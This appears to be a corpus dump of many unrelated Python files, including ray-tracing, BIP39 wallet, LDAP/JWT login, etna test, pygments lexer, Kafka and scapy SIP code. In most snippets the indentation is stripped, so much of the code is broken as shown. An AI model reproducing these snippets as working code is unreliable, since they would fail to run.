d = np.sqrt(np.dot((ptx-prx),(ptx-prx)))
tau = d/0.3
print d,tau
logging.info('Signature')
S = Signatures(L,nc1,nc2)
a =time.time()
logging.info('Calculate signature')
#S.run2(cutoff=6,dcut=3)
S.run(cutoff=2)
b=time.time()
print b-a
for i in L.Gi.nodes():
ei = eval(i)
if type(ei)!= int:
if ei[0] == 354:
print i
#Gsi.add_node('Tx')
#Gsi.pos['Tx']=tuple(ptx[:2])
#for i in L.Gt.node[nc1]['inter']:
# if i in Gsi.nodes():
# Gsi.add_edge('Tx',i)
#Gsi.add_node('Rx')
#Gsi.pos['Rx']=tuple(prx[:2])
#for i in L.Gt.node[nc2]['inter']:
# if i in Gsi.nodes():
# Gsi.add_edge(i,'Rx')
#print 'signatures'
#co = nx.dijkstra_path_length(Gsi,'Tx','Rx')
#sig=list(nx.all_simple_paths(Gsi,'Tx','Rx',cutoff=co+2))
#b=time.time()
#print b-a
#f,ax=L.showG('t')
#nx.draw(Gsi,Gsi.pos,ax=ax)
#plt.show()
##S.run(L,metasig,cutoff=3)
#print "r = S.rays "
r = S.rays(ptx,prx)
print "r3 = r.to3D "
r3 = r.to3D()
print "r3.locbas "
r3.locbas(L)
#print "r3.fillinter "
r3.fillinter(L)
r3.show(L)
plt.show()
##
#config = ConfigParser.ConfigParser()
#_filesimul = 'default.ini'
#filesimul = pyu.getlong(_filesimul, "ini")
#config.read(filesimul)
#fGHz = np.linspace(eval(config.get("frequency", "fghzmin")),
# eval(config.get("frequency", "fghzmax")),
# eval(config.get("frequency", "nf")))
#
#Cn=r3.eval(fGHz)
#
#Cn.freq=Cn.fGHz
#sco=Cn.prop2tran(a='theta',b='theta')
#wav = wvf.Waveform()
#ciro = sco.applywavB(wav.sfg)
#
##raynumber = 4
#
##fig=plt.figure('Cpp')
##f,ax=Cn.Cpp.plot(fig=fig,iy=np.array(([raynumber])))
#
##r3d.info(raynumber)
## plt.show()
##
##
##
###
###c11 = r3d.Ctilde[:,:,0,0]
###c12 = r3d.Ctilde[:,:,0,1]
###c21 = r3d.Ctilde[:,:,1,0]
###c22 = r3d.Ctilde[:,:,1,1]
###
###
###
###Cn=Ctilde()
###Cn.Cpp = bs.FUsignal(r3d.I.f, c11)
###Cn.Ctp = bs.FUsignal(r3d.I.f, c12)
###Cn.Cpt = bs.FUsignal(r3d.I.f, c21)
###Cn.Ctt = bs.FUsignal(r3d.I.f, c22)
###Cn.nfreq = r3d.I.nf
###Cn.nray = r3d.nray
###Cn.tauk=r3d.delays
###
###raynumber = 4
###
###fig=plt.figure('Cpp')
###f,ax=Cn.Cpp.plot(fig=fig,iy=np.array(([raynumber])))
###
##
##
##
##
##
##
|
30718
|
from .models import db, User
from m import Router
from m.utils import jsonify
router = Router(prefix='')
@router.route('/', methods=['POST'])
def home(ctx, request):
name = request.json().get('name')
user = User(name=name)
db.session.add(user)
try:
db.session.commit()
except Exception as e:
print(e)
db.session.rollback()
@router.route('/{name}', methods=['GET'])
def get(ctx, request):
name = request.args.get('name')
user = User.query.filter(User.name == name).first_or_404('user {} not exist'.format(name))
return jsonify(code=200, user=user.dictify())
|
30784
|
import wallycore as wally
from . import exceptions
from gaservices.utils import h2b
wordlist_ = wally.bip39_get_wordlist('en')
wordlist = [wally.bip39_get_word(wordlist_, i) for i in range(2048)]
def seed_from_mnemonic(mnemonic_or_hex_seed):
"""Return seed, mnemonic given an input string
mnemonic_or_hex_seed can either be:
- A mnemonic
- A hex seed, with an 'X' at the end, which needs to be stripped
seed will always be returned, mnemonic may be None if a seed was passed
"""
if mnemonic_or_hex_seed.endswith('X'):
mnemonic = None
seed = h2b(mnemonic_or_hex_seed[:-1])
else:
mnemonic = mnemonic_or_hex_seed
written, seed = wally.bip39_mnemonic_to_seed512(mnemonic_or_hex_seed, None)
assert written == wally.BIP39_SEED_LEN_512
assert len(seed) == wally.BIP39_SEED_LEN_512
return seed, mnemonic
def wallet_from_mnemonic(mnemonic_or_hex_seed, ver=wally.BIP32_VER_MAIN_PRIVATE):
"""Generate a BIP32 HD Master Key (wallet) from a mnemonic phrase or a hex seed"""
seed, mnemonic = seed_from_mnemonic(mnemonic_or_hex_seed)
return wally.bip32_key_from_seed(seed, ver, wally.BIP32_FLAG_SKIP_HASH)
def _decrypt_mnemonic(mnemonic, password):
"""Decrypt a 27 word encrypted mnemonic to a 24 word mnemonic"""
mnemonic = ' '.join(mnemonic.split())
entropy = bytearray(wally.BIP39_ENTROPY_LEN_288)
assert wally.bip39_mnemonic_to_bytes(None, mnemonic, entropy) == len(entropy)
salt, encrypted = entropy[32:], entropy[:32]
derived = bytearray(64)
wally.scrypt(password.encode('utf-8'), salt, 16384, 8, 8, derived)
key, decrypted = derived[32:], bytearray(32)
wally.aes(key, encrypted, wally.AES_FLAG_DECRYPT, decrypted)
for i in range(len(decrypted)):
decrypted[i] ^= derived[i]
if wally.sha256d(decrypted)[:4] != salt:
raise exceptions.InvalidMnemonicOrPasswordError('Incorrect password')
return wally.bip39_mnemonic_from_bytes(None, decrypted)
def check_mnemonic_or_hex_seed(mnemonic):
"""Raise an error if mnemonic/hex seed is invalid"""
if ' ' not in mnemonic:
if mnemonic.endswith('X'):
# mnemonic is the hex seed
return
msg = 'Mnemonic words must be separated by spaces, hex seed must end with X'
raise exceptions.InvalidMnemonicOrPasswordError(msg)
for word in mnemonic.split():
if word not in wordlist:
msg = 'Invalid word: {}'.format(word)
raise exceptions.InvalidMnemonicOrPasswordError(msg)
try:
wally.bip39_mnemonic_validate(None, mnemonic)
except ValueError:
raise exceptions.InvalidMnemonicOrPasswordError('Invalid mnemonic checksum')
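# Hedged usage sketch (comments only): the 24-word phrase below is the well-known
# all-zero-entropy BIP39 test vector, not a usable wallet seed, and merely shows
# the call order of the helpers above.
#
#   mnemonic = ' '.join(['abandon'] * 23 + ['art'])
#   check_mnemonic_or_hex_seed(mnemonic)
#   seed, _ = seed_from_mnemonic(mnemonic)
#   master_key = wallet_from_mnemonic(mnemonic)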
|
30791
|
from rest_framework import status
from rest_framework.exceptions import APIException
class FeatureStateVersionError(APIException):
status_code = status.HTTP_400_BAD_REQUEST
class FeatureStateVersionAlreadyExistsError(FeatureStateVersionError):
status_code = status.HTTP_400_BAD_REQUEST
def __init__(self, version: int):
super(FeatureStateVersionAlreadyExistsError, self).__init__(
f"Version {version} already exists for FeatureState."
)
|
30793
|
import numpy as np
import pandas as pd
import pytest
from etna.datasets import TSDataset
from etna.datasets import generate_ar_df
from etna.datasets import generate_const_df
from etna.datasets import generate_periodic_df
from etna.metrics import R2
from etna.models import LinearPerSegmentModel
from etna.transforms import FilterFeaturesTransform
from etna.transforms.encoders.categorical import LabelEncoderTransform
from etna.transforms.encoders.categorical import OneHotEncoderTransform
@pytest.fixture
def two_df_with_new_values():
d = {
"timestamp": list(pd.date_range(start="2021-01-01", end="2021-01-03"))
+ list(pd.date_range(start="2021-01-01", end="2021-01-03")),
"segment": ["segment_0", "segment_0", "segment_0", "segment_1", "segment_1", "segment_1"],
"regressor_0": [5, 8, 5, 9, 5, 9],
"target": [1, 2, 3, 4, 5, 6],
}
df1 = TSDataset.to_dataset(pd.DataFrame(d))
d = {
"timestamp": list(pd.date_range(start="2021-01-01", end="2021-01-03"))
+ list(pd.date_range(start="2021-01-01", end="2021-01-03")),
"segment": ["segment_0", "segment_0", "segment_0", "segment_1", "segment_1", "segment_1"],
"regressor_0": [5, 8, 9, 5, 0, 0],
"target": [1, 2, 3, 4, 5, 6],
}
df2 = TSDataset.to_dataset(pd.DataFrame(d))
return df1, df2
@pytest.fixture
def df_for_ohe_encoding():
df_to_forecast = generate_ar_df(10, start_time="2021-01-01", n_segments=1)
d = {
"timestamp": pd.date_range(start="2021-01-01", end="2021-01-12"),
"regressor_0": [5, 8, 5, 8, 5, 8, 5, 8, 5, 8, 5, 8],
"regressor_1": [9, 5, 9, 5, 9, 5, 9, 5, 9, 5, 9, 5],
"regressor_2": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"regressor_3": [1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7],
}
df_regressors = pd.DataFrame(d)
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
tsdataset = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
answer_on_regressor_0 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_0["test_0"] = answer_on_regressor_0["regressor_0"].apply(lambda x: float(x == 5))
answer_on_regressor_0["test_1"] = answer_on_regressor_0["regressor_0"].apply(lambda x: float(x == 8))
answer_on_regressor_0["test_0"] = answer_on_regressor_0["test_0"].astype("category")
answer_on_regressor_0["test_1"] = answer_on_regressor_0["test_1"].astype("category")
answer_on_regressor_1 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_1["test_0"] = answer_on_regressor_1["regressor_1"].apply(lambda x: float(x == 5))
answer_on_regressor_1["test_1"] = answer_on_regressor_1["regressor_1"].apply(lambda x: float(x == 9))
answer_on_regressor_1["test_0"] = answer_on_regressor_1["test_0"].astype("category")
answer_on_regressor_1["test_1"] = answer_on_regressor_1["test_1"].astype("category")
answer_on_regressor_2 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_2["test_0"] = answer_on_regressor_2["regressor_2"].apply(lambda x: float(x == 0))
answer_on_regressor_2["test_0"] = answer_on_regressor_2["test_0"].astype("category")
return tsdataset.df, (answer_on_regressor_0, answer_on_regressor_1, answer_on_regressor_2)
@pytest.fixture
def df_for_label_encoding():
df_to_forecast = generate_ar_df(10, start_time="2021-01-01", n_segments=1)
d = {
"timestamp": pd.date_range(start="2021-01-01", end="2021-01-12"),
"regressor_0": [5, 8, 5, 8, 5, 8, 5, 8, 5, 8, 5, 8],
"regressor_1": [9, 5, 9, 5, 9, 5, 9, 5, 9, 5, 9, 5],
"regressor_2": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
"regressor_3": [1, 7, 1, 7, 1, 7, 1, 7, 1, 7, 1, 7],
}
df_regressors = pd.DataFrame(d)
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
tsdataset = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
answer_on_regressor_0 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_0["test"] = answer_on_regressor_0["regressor_0"].apply(lambda x: float(x == 8))
answer_on_regressor_0["test"] = answer_on_regressor_0["test"].astype("category")
answer_on_regressor_1 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_1["test"] = answer_on_regressor_1["regressor_1"].apply(lambda x: float(x == 9))
answer_on_regressor_1["test"] = answer_on_regressor_1["test"].astype("category")
answer_on_regressor_2 = tsdataset.df.copy()["segment_0"]
answer_on_regressor_2["test"] = answer_on_regressor_2["regressor_2"].apply(lambda x: float(x == 1))
answer_on_regressor_2["test"] = answer_on_regressor_2["test"].astype("category")
return tsdataset.df, (answer_on_regressor_0, answer_on_regressor_1, answer_on_regressor_2)
@pytest.fixture
def df_for_naming():
df_to_forecast = generate_ar_df(10, start_time="2021-01-01", n_segments=1)
df_regressors = generate_periodic_df(12, start_time="2021-01-01", scale=10, period=2, n_segments=2)
df_regressors = df_regressors.pivot(index="timestamp", columns="segment").reset_index()
df_regressors.columns = ["timestamp"] + ["regressor_1", "2"]
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
tsdataset = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
return tsdataset.df
def test_label_encoder_simple(df_for_label_encoding):
"""Test that LabelEncoderTransform works correct in a simple cases."""
df, answers = df_for_label_encoding
for i in range(3):
le = LabelEncoderTransform(in_column=f"regressor_{i}", out_column="test")
le.fit(df)
cols = le.transform(df)["segment_0"].columns
assert le.transform(df)["segment_0"][cols].equals(answers[i][cols])
def test_ohe_encoder_simple(df_for_ohe_encoding):
"""Test that OneHotEncoderTransform works correct in a simple case."""
df, answers = df_for_ohe_encoding
for i in range(3):
ohe = OneHotEncoderTransform(in_column=f"regressor_{i}", out_column="test")
ohe.fit(df)
cols = ohe.transform(df)["segment_0"].columns
assert ohe.transform(df)["segment_0"][cols].equals(answers[i][cols])
def test_value_error_label_encoder(df_for_label_encoding):
"""Test LabelEncoderTransform with wrong strategy."""
df, _ = df_for_label_encoding
with pytest.raises(ValueError, match="The strategy"):
le = LabelEncoderTransform(in_column="target", strategy="new_vlue")
le.fit(df)
le.transform(df)
@pytest.mark.parametrize(
"strategy, expected_values",
[
("new_value", np.array([[5, 0, 1, 5, 0, 4], [8, 1, 2, 0, -1, 5], [9, -1, 3, 0, -1, 6]])),
("none", np.array([[5, 0, 1, 5, 0, 4], [8, 1, 2, 0, np.nan, 5], [9, np.nan, 3, 0, np.nan, 6]])),
("mean", np.array([[5, 0, 1, 5, 0, 4], [8, 1, 2, 0, 0, 5], [9, 0.5, 3, 0, 0, 6]])),
],
)
def test_new_value_label_encoder(two_df_with_new_values, strategy, expected_values):
"""Test LabelEncoderTransform correct works with unknown values."""
df1, df2 = two_df_with_new_values
le = LabelEncoderTransform(in_column="regressor_0", strategy=strategy)
le.fit(df1)
np.testing.assert_array_almost_equal(le.transform(df2).values, expected_values)
def test_new_value_ohe_encoder(two_df_with_new_values):
"""Test OneHotEncoderTransform correct works with unknown values."""
expected_values = np.array(
[
[5.0, 1.0, 1.0, 0.0, 5.0, 4.0, 1.0, 0.0],
[8.0, 2.0, 0.0, 1.0, 0.0, 5.0, 0.0, 0.0],
[9.0, 3.0, 0.0, 0.0, 0.0, 6.0, 0.0, 0.0],
]
)
df1, df2 = two_df_with_new_values
ohe = OneHotEncoderTransform(in_column="regressor_0", out_column="targets")
ohe.fit(df1)
np.testing.assert_array_almost_equal(ohe.transform(df2).values, expected_values)
def test_naming_ohe_encoder(two_df_with_new_values):
"""Test OneHotEncoderTransform gives the correct columns."""
df1, df2 = two_df_with_new_values
ohe = OneHotEncoderTransform(in_column="regressor_0", out_column="targets")
ohe.fit(df1)
segments = ["segment_0", "segment_1"]
target = ["target", "targets_0", "targets_1", "regressor_0"]
assert set([(i, j) for i in segments for j in target]) == set(ohe.transform(df2).columns.values)
@pytest.mark.parametrize(
"in_column, prefix",
[("2", ""), ("regressor_1", "regressor_")],
)
def test_naming_ohe_encoder_no_out_column(df_for_naming, in_column, prefix):
"""Test OneHotEncoderTransform gives the correct columns with no out_column."""
df = df_for_naming
ohe = OneHotEncoderTransform(in_column=in_column)
ohe.fit(df)
answer = set(
list(df["segment_0"].columns) + [prefix + str(ohe.__repr__()) + "_0", prefix + str(ohe.__repr__()) + "_1"]
)
assert answer == set(ohe.transform(df)["segment_0"].columns.values)
@pytest.mark.parametrize(
"in_column, prefix",
[("2", ""), ("regressor_1", "regressor_")],
)
def test_naming_label_encoder_no_out_column(df_for_naming, in_column, prefix):
"""Test LabelEncoderTransform gives the correct columns with no out_column."""
df = df_for_naming
le = LabelEncoderTransform(in_column=in_column)
le.fit(df)
answer = set(list(df["segment_0"].columns) + [prefix + str(le.__repr__())])
assert answer == set(le.transform(df)["segment_0"].columns.values)
@pytest.fixture
def ts_for_ohe_sanity():
df_to_forecast = generate_const_df(periods=100, start_time="2021-01-01", scale=0, n_segments=1)
df_regressors = generate_periodic_df(periods=120, start_time="2021-01-01", scale=10, period=4, n_segments=1)
df_regressors = df_regressors.pivot(index="timestamp", columns="segment").reset_index()
df_regressors.columns = ["timestamp"] + [f"regressor_{i}" for i in range(1)]
df_regressors["segment"] = "segment_0"
df_to_forecast = TSDataset.to_dataset(df_to_forecast)
df_regressors = TSDataset.to_dataset(df_regressors)
rng = np.random.default_rng(12345)
def f(x):
return x ** 2 + rng.normal(0, 0.01)
df_to_forecast["segment_0", "target"] = df_regressors["segment_0"]["regressor_0"][:100].apply(f)
ts = TSDataset(df=df_to_forecast, freq="D", df_exog=df_regressors)
return ts
def test_ohe_sanity(ts_for_ohe_sanity):
"""Test for correct work in the full forecasting pipeline."""
horizon = 10
train_ts, test_ts = ts_for_ohe_sanity.train_test_split(test_size=horizon)
ohe = OneHotEncoderTransform(in_column="regressor_0")
filt = FilterFeaturesTransform(exclude=["regressor_0"])
train_ts.fit_transform([ohe, filt])
model = LinearPerSegmentModel()
model.fit(train_ts)
future_ts = train_ts.make_future(horizon)
forecast_ts = model.forecast(future_ts)
r2 = R2()
assert 1 - r2(test_ts, forecast_ts)["segment_0"] < 1e-5
|
30845
|
from pygments.lexer import RegexLexer, include, words
from pygments.token import *
# https://docs.nvidia.com/cuda/parallel-thread-execution/index.html
class CustomLexer(RegexLexer):
string = r'"[^"]*?"'
followsym = r'[a-zA-Z0-9_$]*'
identifier = r'(?:[a-zA-Z]' + followsym + r'| [_$%]' + followsym + r')'
tokens = {
'root': [
include('whitespace'),
(r'%' + identifier, Name.Variable),
include('definition'),
include('statement'),
include('type'),
(identifier, Name.Variable),
(r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float),
(r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float),
(r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex),
(r'0[0-7]+[LlUu]*', Number.Oct),
(r'\b\d+[LlUu]*\b', Number.Integer),
(r'[&|^+*/%=~-]', Operator),
(r'[()\[\]\{\},.;<>@]', Punctuation),
],
'whitespace': [
(r'(\n|\s)+', Text),
(r'/\*.*?\*/', Comment.Multiline),
(r'//.*?\n', Comment.Single),
],
'definition': [
(words(('func', 'reg'), prefix=r'\.', suffix=r'\b'), Keyword.Reserved),
(r'^' + identifier + r':', Name.Label),
],
'statement': [
# directive
(words((
'address_size', 'file', 'minnctapersm', 'target', 'align', 'func', 'param',
'tex', 'branchtarget', 'global', 'pragma', 'version', 'callprototype',
'loc', 'reg', 'visible', 'calltargets', 'local', 'reqntid', 'weak', 'const',
'maxnctapersm', 'section', 'entry', 'maxnreg', 'shared', 'extern',
'maxntid', 'sreg', ), prefix=r'\.', suffix=r'\b'), Keyword),
# instruction
(words((
'abs', 'div', 'or', 'sin', 'add', 'ex2', 'pmevent', 'slct', 'vmad', 'addc',
'exit', 'popc', 'sqrt', 'vmax', 'and', 'fma', 'prefetch', 'st', 'atom',
'isspacep', 'prefetchu', 'sub', 'vmin', 'bar', 'ld', 'prmt', 'subc', 'bfe',
'ldu', 'rcp', 'suld', 'vote', 'bfi', 'lg2', 'red', 'suq', 'vset', 'bfind',
'mad', 'rem', 'sured', 'bret', 'sust', 'vshl', 'brev', 'madc', 'rsqrt',
'testp', 'vshr', 'brkpt', 'max', 'sad', 'tex', 'vsub', 'call', 'membar',
'selp', 'tld4', 'clz', 'min', 'set', 'trap', 'xor', 'cnot', 'mov', 'setp',
'txq', 'copysign', 'mul', 'shf', 'vabsdiff', 'cos', 'shfl', 'cvta', 'not',
'shr', 'cvt', 'neg', 'shl', 'vadd'), prefix=r'\b', suffix=r'[\.\w]+\b'), Keyword),
(words((
'vavrg', 'vmax', 'vmin', 'vset', 'mad', 'vsub', 'mul', 'vabsdiff',
'vadd'), prefix=r'\b', suffix=r'[24]\b'), Keyword),
],
'type': [
(words((
's8', 's16', 's32', 's64',
'u8', 'u16', 'u32', 'u64',
'f16', 'f16x2', 'f32', 'f64',
'b8', 'b16', 'b32', 'b64',
'pred'), prefix=r'\.', suffix=r'\b'), Keyword.Type),
],
}
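# Hedged usage sketch: run a small, made-up PTX fragment through the lexer above
# with a stock pygments formatter; the sample text is illustrative only.
if __name__ == '__main__':
    from pygments import highlight
    from pygments.formatters import TerminalFormatter
    sample = '\n'.join([
        '.visible .entry kernel(.param .u64 ptr)',
        '{',
        '    .reg .f32 %f<3>;',
        '    add.f32 %f3, %f1, %f2;',
        '    ret;',
        '}',
    ])
    print(highlight(sample, CustomLexer(), TerminalFormatter()))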
|
30859
|
singular = [
'this','as','is','thesis','hypothesis','less','obvious','us','yes','cos',
'always','perhaps','alias','plus','apropos',
'was','its','bus','his','is','us',
'this','thus','axis','bias','minus','basis',
'praxis','status','modulus','analysis',
'aparatus'
]
invariable = [ #frozen_list - cannot be given a synonym
'a','an','all','and','any','are','as','assume','be','by',
'case','classifier',
'coercion','conjecture','contradiction','contrary','corollary','declare',
'def',
'define','defined','definition','denote','division','do','document',
'does','dump','each','else','end','enddivision','endsection',
'endsubdivision','endsubsection','endsubsubsection','equal',
'equation','error','enter','every','exhaustive','exist','exit',
'false','fix','fixed','for','forall','formula','fun','function','has','have',
'having','hence','holding','hypothesis','if','iff','in','inferring',
'indeed','induction','inductive','introduce','is','it','left','lemma',
'let','library','make','map','match','moreover','mutual','namespace',
'no','not','notational','notation',
'notationless','obvious','of','off','on','only','ontored','or','over',
'pairwise','parameter','precedence','predicate','printgoal',
'proof','prop','property','prove','proposition',
'propped','qed','quotient','read','record','register','recursion','right',
'said','say','section','show','some','stand','structure','subdivision',
'subsection','subsubsection','such','suppose','synonym','take','that',
'the','then','theorem','there','therefore','thesis','this','timelimit',
'to','total','trivial','true','type','unique','us',
'warning','we','well','welldefined','well_defined','well_propped',
'where','with','write','wrong','yes',
#(* plural handled by sing 'classifiers', 'exists','implement',
# 'parameters','properties','propositions','synonyms','types',
]
transition = [ #phrase_list_transition_words
'a basic fact is','accordingly','additionally','again','also','and yet','as a result',
'as usual','as we have seen','as we see','at the same time','besides','but',
'by definition','certainly','clearly','computations show','consequently',
'conversely','equally important','explicitly','finally','first','for example',
'for instance','for simplicity','for that reason','for this purpose','further',
'furthermore','generally','hence','here','however','importantly','in addition',
'in any event','in brief','in consequence','in contrast','in contrast to this',
'in each case','in fact','in general','in other words','in particular','in short',
'in sum','in summary','in the present case','in the same way','in this computation',
'in this sense','indeed','it follows','it is clear','it is enough to show',
'it is known','it is routine','it is trivial to see','it is understood',
'it turns out','last','likewise','more precisely','moreover','most importantly',
'neverthess','next','nonetheless','note',
'notice','now','observe','obviously','of course','on the contrary','on the other hand',
'on the whole','otherwise','second','similarly','so','specifically','still',
'that is','the point is','then','therefore','third','this gives','this implies',
'this means','this yields','thus','thus far','to begin with','to this end',
'trivially','we claim','we emphasize','we first show','we get','we have seen',
'we have','we know','we check','we may check','we obtain','we remark','we say','we see',
'we show','we understand','we write','recall','we recall',
'without loss of generality','yet'
]
preposition_list = [
'aboard','about','above','according to', 'across', 'against', 'ahead of',
'along','alongside','amid','amidst','among','around','at','atop','away from',
'before',
'behind','below','beneath','beside','between','beyond','by','concerning','despite',
'except','except at','excluding','following',
'from','in','in addition to','in place of','in regard to',
'inside','instead of','into','near','next to','of',
'off','on','on behalf of','on top of','onto','opposite','out','out of',
'outside','outside of',
'over','owing to','per','prior to','regarding','save','through',
'throughout','till','to','towards','under','until',
'up','up to','upon','with','with respect to','wrt','within','without'
# 'for', 'as', 'like', 'after', 'round', 'plus', 'since', 'than', 'past',
# 'during',
# synonyms with\~respect\~to/wrt
]
prim_list = [
'prim_classifier',
'prim_term_op_controlseq',
'prim_binary_relation_controlseq',
'prim_propositional_op_controlseq',
'prim_type_op_controlseq',
'prim_term_controlseq',
'prim_type_controlseq',
'prim_lambda_binder',
'prim_pi_binder',
'prim_binder_prop',
'prim_typed_name',
'prim_adjective',
'prim_adjective_multisubject',
'prim_simple_adjective',
'prim_simple_adjective_multisubject',
'prim_field_term_accessor',
'prim_field_type_accessor',
'prim_field_prop_accessor',
'prim_definite_noun',
'prim_identifier_term',
'prim_identifier_type',
'prim_possessed_noun',
'prim_verb',
'prim_verb_multisubject',
'prim_structure',
'prim_type_op',
'prim_type_word',
'prim_term_op',
'prim_binary_relation_op',
'prim_propositional_op',
'prim_relation'
]
|
30895
|
from zerocopy import send_from
from socket import *
s = socket(AF_INET, SOCK_STREAM)
s.bind(('', 25000))
s.listen(1)
c,a = s.accept()
import numpy
a = numpy.arange(0.0, 50000000.0)
send_from(a, c)
c.close()
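# Hedged sketch of the matching receive side (run as a separate process); this is
# the usual recv_into/memoryview pattern and is an assumption, not part of the
# zerocopy module imported above:
#
#   from socket import socket, AF_INET, SOCK_STREAM
#   import numpy
#   c = socket(AF_INET, SOCK_STREAM)
#   c.connect(('localhost', 25000))
#   a = numpy.zeros(50000000, dtype=float)
#   view = memoryview(a).cast('B')
#   while len(view):
#       nrecv = c.recv_into(view)
#       view = view[nrecv:]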
|
30937
|
if __name__ == '__main__':
n = int(input())
s = set()
for i in range (n):
s.add(input())
    print(len(s))
|
30941
|
import datetime
from flask_ldap3_login import LDAP3LoginManager, AuthenticationResponseStatus
from lost.settings import LOST_CONFIG, FLASK_DEBUG
from flask_jwt_extended import create_access_token, create_refresh_token
from lost.db.model import User as DBUser, Group
from lost.db import roles
class LoginManager():
def __init__(self, dbm, user_name, password):
self.dbm = dbm
self.user_name = user_name
self.password = password
def login(self):
if LOST_CONFIG.ldap_config['LDAP_ACTIVE']:
access_token, refresh_token = self.__authenticate_ldap()
else:
access_token, refresh_token = self.__authenticate_flask()
if access_token and refresh_token:
return {
'token': access_token,
'refresh_token': refresh_token
}, 200
return {'message': 'Invalid credentials'}, 401
def __get_token(self, user_id):
expires = datetime.timedelta(minutes=LOST_CONFIG.session_timeout)
expires_refresh = datetime.timedelta(minutes=LOST_CONFIG.session_timeout + 2)
if FLASK_DEBUG:
expires = datetime.timedelta(days=365)
expires_refresh = datetime.timedelta(days=366)
access_token = create_access_token(identity=user_id, fresh=True, expires_delta=expires)
refresh_token = create_refresh_token(user_id, expires_delta=expires_refresh)
return access_token, refresh_token
def __authenticate_flask(self):
if self.user_name:
user = self.dbm.find_user_by_user_name(self.user_name)
if user and user.check_password(self.password):
return self.__get_token(user.idx)
return None, None
def __authenticate_ldap(self):
# auth with ldap
ldap_manager = LDAP3LoginManager()
ldap_manager.init_config(LOST_CONFIG.ldap_config)
# Check if the credentials are correct
response = ldap_manager.authenticate(self.user_name, self.password)
if response.status != AuthenticationResponseStatus.success:
# no user found in ldap, try it with db user:
return self.__authenticate_flask()
user_info = response.user_info
user = self.dbm.find_user_by_user_name(self.user_name)
# user not in db:
if not user:
user = self.__create_db_user(user_info)
else:
# user in db -> synch with ldap
user = self.__update_db_user(user_info, user)
return self.__get_token(user.idx)
def __create_db_user(self, user_info):
user = DBUser(user_name=user_info['uid'], email=user_info['mail'],
email_confirmed_at=datetime.datetime.now(), first_name=user_info['givenName'],
last_name=user_info['sn'], is_external=True)
anno_role = self.dbm.get_role_by_name(roles.ANNOTATOR)
user.roles.append(anno_role)
user.groups.append(Group(name=user.user_name, is_user_default=True))
self.dbm.save_obj(user)
return user
def __update_db_user(self, user_info, user):
user.email = user_info['mail']
user.first_name = user_info['givenName']
user.last_name = user_info['sn']
self.dbm.save_obj(user)
return user
|
30972
|
def main():
a = ["a", 1, "5", 2.3, 1.2j]
some_condition = True
for x in a:
# If it's all isinstance, we can use a type switch
if isinstance(x, (str, float)):
print("String or float!")
elif isinstance(x, int):
print("Integer!")
else:
print("Dunno!")
print(":)")
# If it's got mixed expressions, we will inline a switch for the isinstance expression
if isinstance(x, str) and some_condition:
print("String")
elif isinstance(x, int):
print("Integer!")
else:
print("Dunno!!")
print(":O")
if __name__ == '__main__':
main()
|
31027
|
import time
import os
from pykafka.test.kafka_instance import KafkaInstance, KafkaConnection
def get_cluster():
"""Gets a Kafka cluster for testing, using one already running is possible.
An already-running cluster is determined by environment variables:
BROKERS, ZOOKEEPER, KAFKA_BIN. This is used primarily to speed up tests
in our Travis-CI environment.
"""
if os.environ.get('BROKERS', None) and \
os.environ.get('ZOOKEEPER', None) and \
os.environ.get('KAFKA_BIN', None):
# Broker is already running. Use that.
return KafkaConnection(os.environ['KAFKA_BIN'],
os.environ['BROKERS'],
os.environ['ZOOKEEPER'],
os.environ.get('BROKERS_SSL', None))
else:
return KafkaInstance(num_instances=3)
def stop_cluster(cluster):
"""Stop a created cluster, or merely flush a pre-existing one."""
if isinstance(cluster, KafkaInstance):
cluster.terminate()
else:
cluster.flush()
def retry(assertion_callable, retry_time=10, wait_between_tries=0.1, exception_to_retry=AssertionError):
"""Retry assertion callable in a loop"""
start = time.time()
while True:
try:
return assertion_callable()
except exception_to_retry as e:
if time.time() - start >= retry_time:
raise e
time.sleep(wait_between_tries)
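# Hedged usage sketch for retry(): poll an assertion until it passes or the retry
# window elapses; the lists below are illustrative stand-ins for real cluster state.
if __name__ == '__main__':
    produced = ['m1', 'm2']
    consumed = list(produced)  # pretend a consumer has caught up
    def assert_consumer_caught_up():
        assert consumed == produced, 'consumer lagging'
    retry(assert_consumer_caught_up, retry_time=5, wait_between_tries=0.5)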
|
31031
|
import base64
from scapy.layers.inet import *
from scapy.layers.dns import *
import dissector
class SIPStartField(StrField):
"""
field class for handling sip start field
    @attention: it inherits StrField from the Scapy library
"""
holds_packets = 1
name = "SIPStartField"
def getfield(self, pkt, s):
"""
this method will get the packet, takes what does need to be
taken and let the remaining go, so it returns two values.
first value which belongs to this field and the second is
the remaining which does need to be dissected with
other "field classes".
@param pkt: holds the whole packet
@param s: holds only the remaining data which is not dissected yet.
"""
cstream = -1
if pkt.underlayer.name == "TCP":
cstream = dissector.check_stream(\
pkt.underlayer.underlayer.fields["src"],\
pkt.underlayer.underlayer.fields["dst"],\
pkt.underlayer.fields["sport"],\
pkt.underlayer.fields["dport"],\
pkt.underlayer.fields["seq"], s)
if not cstream == -1:
s = cstream
remain = ""
value = ""
ls = s.splitlines(True)
f = ls[0].split()
if "SIP" in f[0]:
ls = s.splitlines(True)
f = ls[0].split()
length = len(f)
value = ""
if length == 3:
value = "SIP-Version:" + f[0] + ", Status-Code:" +\
f[1] + ", Reason-Phrase:" + f[2]
ls.remove(ls[0])
for element in ls:
remain = remain + element
